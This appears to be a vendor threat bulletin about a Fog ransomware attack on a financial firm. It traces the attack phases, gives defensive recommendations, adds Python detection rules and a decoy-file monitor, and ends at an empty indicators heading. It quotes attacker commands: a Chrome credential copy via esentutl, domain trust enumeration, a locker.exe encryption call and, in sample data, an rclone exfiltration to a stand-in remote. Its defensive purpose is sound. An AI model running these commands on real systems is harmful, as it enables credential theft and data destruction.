Fog Ransomware Now Targeting the Financial Sector; Adlumin Thwarts Attack

Threat Bulletin Series

Key Takeaways

  • The Fog Ransomware group, which has historically been observed only attacking organizations in the education and recreational sectors, is now pursuing more lucrative targets in the financial services sector.
  • Adlumin responded to a ransomware attack on a financial services customer in August 2024, with evidence connecting the activity to Fog, including techniques previously used against education and recreation targets.
  • Adlumin’s technology isolated the affected machines and locked out attackers within minutes, preventing any significant encryption or data theft from taking place.
  • Further investigation found indicators of compromise, including IP addresses originating in Russia. Little is known about Fog Ransomware, including any geographic ties, and this alone is not enough evidence to attribute a geographic origin with high confidence, since attackers may mask their location with jump servers or other techniques.

In early August 2024, threat actors launched a ransomware attack on a mid-sized financial business using compromised VPN credentials. The cybercriminals deployed a ransomware variant known as “Fog” (a.k.a. “Lost in the Fog”) targeting sensitive data on endpoints running both Windows and Linux operating systems. However, the attack was successfully thwarted by Adlumin’s innovative technology, which uses decoy files as sensors to detect ransomware activity within the network.

The Fog Ransomware

Fog is a variant of the STOP/DJVU ransomware family, first observed in 2021. It uses compromised VPN credentials to breach network defenses and primarily targets sectors such as education and recreation. Once inside a network, Fog uses advanced techniques, including pass-the-hash attacks, to escalate privileges to an administrative level, significantly amplifying its impact.

After infiltration, Fog executes a series of actions designed to cripple network security. These include disabling protective mechanisms, encrypting critical files—especially Virtual Machine Disks (VMDKs)—and eradicating backup data, leaving victims with little choice but to consider paying the ransom. The encrypted files are typically marked with extensions like ‘.FOG’ or ‘.FLOCKED’ and are accompanied by a ransom note directing victims to a negotiation platform on the Tor network.

The lack of direct attribution to established APT groups suggests that Fog ransomware likely originates from a new, highly skilled threat actor.

Network Discovery

The attackers initiated network discovery by sending a series of pings targeting other endpoints. They stored the output of these pings in text files, ‘pings.txt’ and ‘pingw.txt’. Subsequently, they used the tool ‘Advanced_Port_Scanner_2.5.3869(1).exe’ to conduct network reconnaissance, scanning hosts within the network using elevated privileges from the compromised service accounts.

Lateral Movement

The Adlumin team traced the infiltration to an unprotected system, with the attack originating from an IP address in Russia. The attackers used two compromised service accounts to move laterally within the network, enumerating domain trust relationships by executing the command:

nltest /domain_trusts

They then deployed a binary called ‘SharpShares.exe’ to map network drives and share folders on other machines, enabling further lateral movement.

Credential Harvesting

The next step involved using the Microsoft command-line utility ‘esentutl.exe’ to back up login data stored on endpoints for multiple users, including encrypted credentials from Google Chrome, using the following command (where <USERNAME> stands for the redacted account name):

cmd.exe /Q /c esentutl.exe /y "C:\Users\<USERNAME>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\<USERNAME>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"

Execution

The threat actor used ‘Rclone’, a powerful open-source command-line tool, to sync and transfer data from compromised endpoints. They tailored the command to include files modified within the last two years while excluding certain file types.

The ransomware was propagated using a tool named ‘locker.exe’, signifying its role in encrypting or ‘locking’ the files. The following command was executed (where <HOSTS> and <SHAREDRIVE> stand for the redacted target host and share names):

C:\programdata\locker.exe -id xCcNKl -nomutex -size 10 -console -target \\<HOSTS>.DOMAIN.COM\<SHAREDRIVE>

A ‘readme.txt’ file containing the ransom letter was then placed on all infected endpoints. Additionally, the attackers used WMIC and PowerShell commands to delete system shadow copies, preventing victims from restoring their files from backups.
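To show how the command lines in the Network Discovery, Lateral Movement, Credential Harvesting and Execution sections translate into detection logic, here is an added example (written for this page, not Adlumin's code or tooling) that runs regex rules over constructed process-creation events modelled on those commands; hosts, users and paths are made up.

```python
import re
from collections import defaultdict

# Constructed process-creation events (EDR/Sysmon-style), modelled on the command
# lines described in this bulletin. Hosts, users and paths are made up.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "svc_backup", "cmd": r"cmd.exe /c ping -n 1 10.0.0.12 >> C:\temp\pingw.txt"},
    {"host": "WS01", "user": "svc_backup", "cmd": r"C:\Users\Public\Advanced_Port_Scanner_2.5.3869(1).exe"},
    {"host": "WS01", "user": "svc_backup", "cmd": r"nltest /domain_trusts"},
    {"host": "WS01", "user": "svc_backup", "cmd": r"C:\temp\SharpShares.exe"},
    {"host": "WS02", "user": "svc_sql", "cmd": r'cmd.exe /Q /c esentutl.exe /y "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\temp\Login Data.tmp"'},
    {"host": "WS02", "user": "svc_sql", "cmd": r"rclone.exe copy C:\Finance remote:bucket --max-age 730d --exclude *.exe"},
    {"host": "WS02", "user": "svc_sql", "cmd": r"C:\programdata\locker.exe -id xCcNKl -nomutex -size 10 -console -target \\FS01.corp.example\Shared"},
    {"host": "WS02", "user": "svc_sql", "cmd": r"wmic shadowcopy delete"},
    {"host": "WS03", "user": "dba", "cmd": r"esentutl.exe /mh C:\db\edb.dat"},  # benign: database header dump, no /y copy
    {"host": "WS03", "user": "dba", "cmd": r"ping -n 1 10.0.0.1"},              # benign: single ping, output not saved
]

# (rule name, phase as named in this bulletin, case-insensitive regex over the command line)
RULES = [
    ("ping sweep output saved to file", "Network Discovery", r"\bping\b.*>>?\s*\S*\.txt"),
    ("Advanced Port Scanner execution", "Network Discovery", r"advanced_port_scanner"),
    ("domain trust enumeration (nltest)", "Lateral Movement", r"\bnltest(\.exe)?\s+/domain_trusts"),
    ("share enumeration (SharpShares)", "Lateral Movement", r"\bsharpshares(\.exe)?\b"),
    ("esentutl copy of browser Login Data", "Credential Harvesting", r"\besentutl(\.exe)?\s+/y\b.*login data"),
    ("rclone data transfer", "Execution", r"\brclone(\.exe)?\b"),
    ("Fog locker.exe invocation", "Execution", r"\blocker\.exe\b.*(-nomutex|-target\s+\\\\)"),
    ("shadow copy deletion", "Execution",
     r"wmic.*shadowcopy.*delete|vssadmin.*delete\s+shadows|win32_shadowcopy.*(remove|delete)"),
]

def scan_events(events):
    """Return one hit per (event, rule) match; each hit records the phase it belongs to."""
    hits = []
    for ev in events:
        for name, phase, pattern in RULES:
            if re.search(pattern, ev["cmd"], re.IGNORECASE):
                hits.append({"host": ev["host"], "user": ev["user"], "phase": phase,
                             "rule": name, "cmd": ev["cmd"]})
    return hits

def phases_per_host(hits):
    """Map host -> phases seen there; several phases on one host is the escalation pattern described above."""
    seen = defaultdict(set)
    for h in hits:
        seen[h["host"]].add(h["phase"])
    return dict(seen)
```

Running scan_events(SAMPLE_EVENTS) flags eight events on WS01 and WS02 and none on WS03; phases_per_host then shows WS01 progressing from discovery to lateral movement and WS02 from credential harvesting to execution, which is the point at which an analyst would want an automatic isolation to fire.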

Adlumin Ransomware Prevention

As the attack progressed to the exfiltration phase, Adlumin’s Ransomware Prevention feature automatically isolated the affected machines, locked out the attackers, and prevented data theft. Launched in April 2024, this service consists of scripts embedded within the Adlumin Security Platform Agent that monitor malicious activities across customers’ networks.

The agent deploys decoy files on protected endpoints that remain dormant until abnormal or malicious activity is detected. If ransomware attempts to encrypt these files, the scripts automatically execute commands to remove the affected devices from the network, containing the threat and preventing further damage. Alerts are sent to the Adlumin platform for further investigation.
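As an added illustration of the decoy-file idea (example code written for this page, not Adlumin's patented implementation), the following monitor plants decoy files, baselines their hashes, and reports the changes the bulletin associates with Fog: decoys overwritten or renamed, files carrying the .FOG or .FLOCKED extension, or a readme.txt dropped beside them. File names and contents are made up; the isolation action itself is represented by the returned findings.

```python
import hashlib
import tempfile
from pathlib import Path

# Extensions this bulletin reports Fog appending to encrypted files, and the ransom note name.
FOG_EXTENSIONS = (".fog", ".flocked")
RANSOM_NOTE = "readme.txt"

def plant_decoys(root, names=("budget_2023.xlsx", "passwords_old.docx")):
    """Create inert decoy files (made-up names) and return a baseline {path: sha256}."""
    baseline = {}
    for name in names:
        p = Path(root) / name
        p.write_bytes(f"decoy:{name}".encode())  # constructed content, nothing sensitive
        baseline[p] = hashlib.sha256(p.read_bytes()).hexdigest()
    return baseline

def check_decoys(root, baseline):
    """Return findings; any finding is the trigger the bulletin describes for isolating the host."""
    findings = []
    for p, digest in baseline.items():
        if not p.exists():
            findings.append(f"decoy missing or renamed: {p.name}")
        elif hashlib.sha256(p.read_bytes()).hexdigest() != digest:
            findings.append(f"decoy content changed: {p.name}")
    for p in Path(root).iterdir():
        if p.suffix.lower() in FOG_EXTENSIONS:
            findings.append(f"Fog-style extension seen: {p.name}")
        if p.name.lower() == RANSOM_NOTE:
            findings.append(f"ransom note dropped: {p.name}")
    return findings

def run_demo():
    """Plant decoys in a scratch directory, confirm a clean check, then tamper with them and re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        baseline = plant_decoys(tmp)
        clean = check_decoys(tmp, baseline)
        # Tampering touches only the scratch decoys; it stands in for the behaviour the
        # bulletin attributes to the encryptor (overwrite, rename with .FOG, drop readme.txt).
        victim = next(iter(baseline))
        victim.write_bytes(b"\x00" * 32)
        victim.rename(victim.with_name(victim.name + ".FOG"))
        (Path(tmp) / RANSOM_NOTE).write_text("constructed ransom note placeholder")
        return clean, check_decoys(tmp, baseline)

if __name__ == "__main__":
    clean, dirty = run_demo()
    print("before tampering:", clean or "no findings, host stays online")
    print("after tampering:", dirty, "-> isolate host")
```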

Adlumin Ransomware Prevention is a first-of-its-kind patented technology, representing a significant advancement in the fight against ransomware.

Recovery

After isolating the targeted endpoints, security engineers examined the systems and found binaries for port scanners, encryption software, RMM tools, and other artifacts left by the attackers. They also identified the vulnerable endpoints that facilitated the unauthorized access.

The impacted systems were evaluated and restored to full health, eliminating the potential for another similar attack.

Recommendations

The Adlumin Team recommends the following measures to protect against Fog ransomware attacks:

  • Use Multi-Factor Authentication (MFA): Implement MFA for all VPN connections to reduce the risk of compromised credentials.
  • Regularly Update and Patch VPN Software: Ensure all VPN applications are up to date with the latest security patches.
  • Monitor VPN Access: Implement monitoring tools to detect suspicious activities, such as unusual login attempts or access from unfamiliar locations.
  • Isolate Affected Endpoints: Implement automated isolation procedures that trigger when ransomware is detected.
  • Utilize a Comprehensive Security Platform: Protect endpoints with a platform like Adlumin’s, which can monitor and respond to threats in real-time.
  • Disable Unnecessary Services: Avoid using Windows Management Instrumentation Command-line (WMIC) and PowerShell scripts unless necessary.
  • Regularly Backup Critical Data: Maintain up-to-date backups stored offline or in a secure, immutable environment.
  • Apply the Principle of Least Privilege: Limit administrative privileges to minimize the impact of a successful attack.
  • Conduct Regular Security Audits: Regularly audit network and endpoint security to identify and rectify vulnerabilities.
  • Establish Incident Response Plans: Develop and test incident response plans for detecting, containing, and recovering from ransomware attacks.
  • Monitor Network Traffic: Use advanced threat detection to monitor network traffic for signs of lateral movement or other suspicious activities.

Finally, companies should consider adding Adlumin’s Ransomware Prevention service to their network endpoints to prevent ransomware attacks from escalating. For a demo, visit www.adlumin.com/demo.

Indicators of Compromise (IOCs)